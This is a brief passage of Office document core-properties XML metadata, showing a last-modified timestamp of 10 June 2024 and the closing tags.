  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-10T01:08:23Z</dcterms:modified>
</cp:coreProperties>
</file>